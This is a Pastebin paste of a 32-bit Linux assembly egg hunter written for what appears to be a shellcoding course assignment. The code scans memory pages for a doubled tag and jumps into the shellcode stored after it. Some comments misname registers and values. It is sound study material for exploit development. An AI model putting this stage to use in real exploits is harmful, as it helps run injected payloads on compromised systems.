a guest Jul 18th, 2019 53 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ; Filename: egg_hunter_shellcode.nasm
  2. ; Author: Kunal Pachauri
  3. ; SLAE-9237
  5. global _start ; Making the Entry point accessible
  7. section .text
  8. _start: ; Entry Point
  10.     xor ecx, ecx    ; Zeroing out EDX, will use the value in register as the address  to be validated
  12. page_align:
  14.     or cx, 0xfff    ; Result in setting lower 16 bytes of EDX i.e 4095
  16. next_address:
  18.     inc ecx     ; Increment EDX (4095+1 i.e Increasing by Page size)
  19.     push 0x43   ; SYSCALL Number for sigaction i.e 67
  20.     pop eax     ; Loading syscall in EAX
  21.     int 0x80    ; Performing Interrupt
  23. check_efault:
  25.     cmp al, 0xf2    ; 0xf2 represents return value as EFAULT, checking against it
  26.     jz page_align   ; If we get EFAULT, then we need to increase the page number i.e increasing address by 4096
  27.             ; Else, we need to continue and check for the presence of EGG on that memory address
  28. check_egg:
  30.     mov eax, 0x50905090 ; Loading our Egg Tag to compare -> nop,push eax combination
  31.     mov edi, ecx        ; Since scasd compares the string in EAX and EDI, moving the validated address in EDI
  32.     scasd           ; Compares the string, If equal then sets Zero Flag
  33.     jnz next_address    ; If Egg is not found, increement the address and repeat the above steps
  34.     scasd           ; If Egg is matched, check next four bytes are also Egg to make sure it is not finding the egg tag itself
  35.     jnz next_address    ; If Egg is not found, it was the tag itself, increment address and repeat
  36.     jmp edi         ; Egg is found, redirect execution to shellcode
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand